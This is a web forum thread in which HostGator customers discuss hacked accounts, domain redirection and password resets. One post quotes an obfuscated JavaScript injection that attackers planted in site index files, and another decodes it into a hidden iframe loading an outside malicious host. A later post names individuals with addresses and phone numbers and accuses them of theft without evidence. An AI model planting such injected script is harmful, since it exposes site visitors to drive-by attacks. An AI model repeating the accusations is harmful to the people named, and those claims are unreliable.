1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

Hostgator Hosting Account Hacked!!

Discussion in 'Security' started by NaughtyNeo, Mar 5, 2008.

  1. chet1234

    chet1234 Peon

    Messages:
    4
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #21
    I am having the same problem. 19 of my 28 domains on my HostGator reseller account are now hijacked by searchportal.information.com (apparently one of their own domains), which is what comes up when any of the 19 domains' URLs are entered into the browser. One support ticket, two chats and 8 hours later, the problem is still ongoing. To top it off, HostGator asks for a customer survey after the non-productive chat sessions while the problems still exist. WTF?!?

    It's bad enough that this happened but for it to not be fixed some 8 hours after being notified about it, is unacceptable. If this has happened before to others, why wasn't the problem fixed before it happened to me and probably others?
    SEMrush
    I think it is time for me to start looking at other hosting companies and definitely time to get out of the HostGator affiliate program. I can't recommend HostGator when this sort of security problem and significant downtime exists. Very, very disappointed in HostGator.
     
    chet1234, Jul 19, 2008 IP
    SEMrush
  2. chet1234

    chet1234 Peon

    Messages:
    4
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #22
    Well, it took a few hours but HostGator finally fixed the problems on their server. Still no explanation for what caused the domain hijacking by their search portal domain.
     
    chet1234, Jul 21, 2008 IP
  3. CreatingRevenue

    CreatingRevenue Peon

    Messages:
    130
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #23
    It wasn't a hijacking. Some entries were deleted either from the dns server or apache config files themselves which would cause the servers default page to show up. That in this case is searchportal.information.com

    I have seen this happen before with cpanel upgrades and daemon upgrades. It is a very easy fix by just adding the entries back into the configs.

    As for other ip's showing up. That could either be tech support or the admins logging into the cpanel to see what was up. I often did this when I worked there.

    Most of the account hacks I've seen involved poor passwords, crappy scripts that allowed exploitation into the sites code or directories and scripts that were chmod to 777, not the servers fault.
     
    CreatingRevenue, Jul 22, 2008 IP
  4. chet1234

    chet1234 Peon

    Messages:
    4
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #24
    My problems with my HostGator account and domains have been resolved. They were fixed the same day I notified them.

    Thanks also to Brent Oxley, owner of HostGator, for following up and explaining what happened.

    I will stay with HostGator due to the predominantly good experience I've had, and due to their attention and follow up on my recent and only trouble over my two years hosting with them.

    I understand that they were having some trouble with system upgrades and apparently a temporary staffing problem delayed their response to my support requests. Even a good hosting company can stumble on occasion. It is the getting up and going again that makes the difference. So, go HostGator!
     
    chet1234, Jul 28, 2008 IP
  5. e-fun

    e-fun Peon

    Messages:
    210
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #25
    Arkh!! Got the same problem like you.
    My Hostgator Cpanel hacked by someone.
    Can't submit a ticket because I don't know where should I register my email there.
    Anybody can guide me step by step on how to do this?
     
    e-fun, Jul 29, 2008 IP
  6. e-fun

    e-fun Peon

    Messages:
    210
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #26
    Phew. Luckily I got this email very fast during submitting ticket process.
    This email really save my life and help me. Hope all of you will also got this message too.

    
    Dear Username,
    
    As you are aware, we did password resets a couple of months ago to ensure account
    security.
    
    We recently did another audit and found that your current password matches the password
    that you used during sign up.  To ensure security, we are resetting the passwords of all
    accounts that currently utilize the same password as when they signed up.
    
    You may change your password afterwards, as long as it does not match your original
    password.  We will continue auditing passwords on a daily basis and resetting those that
    match the original password created during sign up.
    
    This change affects your ( xxxxx ) account on our ( xx.xx.xx.xxx ) server.
    
    In order to quickly and easily obtain your new password, please click on
    the following link:
    
    [url]https://secure.hostgator.com/password_reset/[/url]
    
    Please ensure that all CPanel account passwords are different from the first registered
    password. Otherwise, it will continue to be reset.
    
    If you have any questions or problems, please direct all support inquires related to this
    password concern to [email]passwords@hostgator.com[/email] or check out
    [url]http://forums.hostgator.com/password-updates-t36306.html?p=132533#post132533[/url] and we will
    do all that we can to assist you. Submitting your questions to this email will ensure that
    you are assisted by representatives trained and able to assist you with password issues.
    
    It is more than likely over the next few days that there will be some delays when
    contacting us.  To ensure these changes go as smoothly as possible we are taking measures
    in all staffing departments to accommodate the anticipated influx.  Rest assured we will
    be working as diligently as possible to keep delays and wait times to a minimum.
    
    We appreciate your patience and cooperation.
    
    Best regards,
    HostGator.com
    Code (markup):
     
    e-fun, Jul 29, 2008 IP
  7. ExtremeData

    ExtremeData Well-Known Member

    Messages:
    450
    Likes Received:
    21
    Best Answers:
    0
    Trophy Points:
    125
    #27
    You will need to reset your password going to this link : https://secure.hostgator.com/password_reset/

    I recived this email

    Edited : Sorry, we posted on same time.
     
    ExtremeData, Jul 29, 2008 IP
  8. valternascimento

    valternascimento Peon

    Messages:
    99
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #28
    Recentely my hostgator account was hacked too. In all my domains the following script was put in my index.php and index.html files

    <!-- o65 --><Script Language='Javascript'>
    <!--
    document.write(unescape('%3C%49%46%52%41%4D%45%20%73%74%79%6C%65%3D%22%57%49%44%54%48%3A%20%30%25%3B%20%48%45%49%47%48%54%3A%20%30%70%78%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6D%79%66%75%63%6B%69%6E%67%2D%70%75%73%73%79%2E%63%6F%6D%2F%74%79%72%65%6B%2F%3F%74%3D%35%22%20%66%72%61%6D%65%42%6F%72%64%65%72%3D%30%20%73%63%72%6F%6C%6C%69%6E%67%3D%6E%6F%20%0A%61%6C%6C%6F%77%54%72%61%6E%73%70%61%72%65%6E%63%79%3E%3C%2F%49%46%52%41%4D%45%3E'));
    //-->
    </Script><!-- c65 -->
     
    valternascimento, Mar 28, 2009 IP
  9. baonhi41

    baonhi41 Peon

    Messages:
    141
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #29
    <!-- o65 --><Script Language='Javascript'>
    <!--
    document.write(unescape('<IFRAME style="WIDTH: 0%; HEIGHT: 0px" src="http://myfucking-pussy.com/tyrek/?t=5" frameBorder=0 scrolling=no
    allowTransparency></IFRAME>'));
    //-->
    </Script><!-- c65 -->

    I decode it for you. READ. I think hostgator.com is insecure
     
    baonhi41, Mar 28, 2009 IP
  10. CreatingRevenue

    CreatingRevenue Peon

    Messages:
    130
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #30
    Hostgator is far from insecure. It is the users own 3rd party software that usually cause issues. There are exploits in Joomla, Wordpress, other CMS software and any other 3rd party software the client puts on the server might potentially be insecure and allow for a hack.

    Believe me... I have seen many a person try and change permissions to 777 on all the files in their home directory. What do you expect will happen when you give everyone read/write/execute permissions?
     
    CreatingRevenue, Apr 1, 2009 IP
  11. calliman702

    calliman702 Peon

    Messages:
    1
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #31
    I do not know about you, but 15 minutes of me paying Google PPC on 100 websites is alot of money especially when the clicks are upwards of 1.25 each! The whole search portal thing is a huge scam! they are hijacking everyones dns through a proxi scam! I found out who it is behind it. the information follows. Believe me it is more of a problem than you know.
    It is also a huge "glitch" in Google PPC search and also Yahoo PPC programs. These people are theives! I suggest that you and everyone else take this provided info and run with it! If you have noticed the "searchportal.information.com" is a "fake" domain, and the true domain is "www.searchportal.com" the .information was "added" by the webmasters to try and cover up their true identities. AND YES IT IS VERY POSSIBLE THAT HOST GATOR IS INVLOVED!

    Here are the Thugs:



    62.110.173.117 I.P address

    HIEBER, RICHARD email address
    Aluffi, Cristiano email address
    Domain servers in listed order:

    SUN1.FABARIS.IT (their servers)
    DNS2.FABARIS.IT


    Administrative Contact:
    HIEBER, RICHARD
    Via San Godenzo 135
    ROMA 00189
    IT
    PRIVATE fax: 123 123 1234

    Technical Contact:
    Aluffi, Cristiano
    Via Goffredo Mameli, 90
    Poggio Mirteto
    RI 02047
    IT
    +39 0765 22181 fax: +39 0765 410100

    Record expires on 13-Apr-2010.
    Record created on 14-Apr-1998.
    Database last updated on 24-Dec-2009 22:24:11 EST.

    Domain servers in listed order:

    SUN1.FABARIS.IT
    DNS2.FABARIS.IT
     
    calliman702, Dec 24, 2009 IP
  12. AshPC

    AshPC Peon

    Messages:
    86
    Likes Received:
    2
    Best Answers:
    0
    Trophy Points:
    0
    #32
    Hostgator are not scammers nor are they cheaters. If you bought shared hosting then you have a higher chance of getting hacked/exploited. Though, if you get a tech staff to look over your site for any loophole and scan for any trojans. You should be fine.
     
    AshPC, Dec 26, 2009 IP
  13. olddocks

    olddocks Notable Member

    Messages:
    3,275
    Likes Received:
    165
    Best Answers:
    0
    Trophy Points:
    215
    #33
    check your php script and look for any mysterious code.
    check meta tags in your files and your .htaccess file.
     
    olddocks, Jan 4, 2010 IP
  14. slipxaway

    slipxaway Active Member

    Messages:
    316
    Likes Received:
    7
    Best Answers:
    0
    Trophy Points:
    60
    #34
    You're absolutely wrong.

    Information.com is NOT a fake domain... Just look at the page source from any one of these domains and it clearly shows the source as coming from searchportal.information.com

    Information.com is owned by Oversee.net who owns Moniker, SnapNames, and DomainSponsor. Also, HostGator is certainly involved, because they even stated it in this thread. They probably have a deal setup with Oversee to use this as their default parking page and then in turn they are able to monetize traffic. They claim to donate it to charity.

    Either way, it's stealing. If I setup an addon domain and then change my nameservers, there is no reason it should display anything other than my site directory...

    Also, the main reason I am upset about this is because it's quite possible it may cause legal troubles. I have a generic domain, which I intend to use for it's generic purpose. However, there is a trademark for the term in a completely unrelated industry. I recently added the domain to my Host Gator account and when I went to the site, what did I see? Advertisements for the trademark holder's products... If by some chance, I receive a UDRP notice, I will be EXTREMELY pissed, to say the least.
     
    slipxaway, Jan 16, 2010 IP
  15. Hatemaker

    Hatemaker Peon

    Messages:
    38
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #35
    I've used Hostgator before and never had any problems with them but then again for the price you pay for shared hosting you really can't expect much more security because there is only so much they can do without limiting your site.
     
    Hatemaker, Jan 18, 2010 IP
  16. submitmaster

    submitmaster Well-Known Member

    Messages:
    329
    Likes Received:
    2
    Best Answers:
    0
    Trophy Points:
    103
    #36
    well ill take peachy dandy any day over hostgator :)
     
    submitmaster, Jan 19, 2010 IP
  17. vacom

    vacom Peon

    Messages:
    29
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #37
    I have no problem with hostgator..Don't install anything script in your hosting because the hacker can attack your hosting anytime. Something script is sucks!
     
    vacom, Jan 24, 2010 IP
  18. LachyTV

    LachyTV Guest

    Messages:
    81
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #38
    I have always been with hostgator hopefully I'm not on your shared server. ;)

    I have never had a problem with them and there support has always been fast, I hope their on top of this.
     
    LachyTV, Jan 25, 2010 IP
  19. Mrsurprise

    Mrsurprise Member

    Messages:
    32
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    36
    #39
    I were using Hosgator (shared) for 4 years on over 60 websites, never had such problems.
     
    Mrsurprise, Nov 19, 2012 IP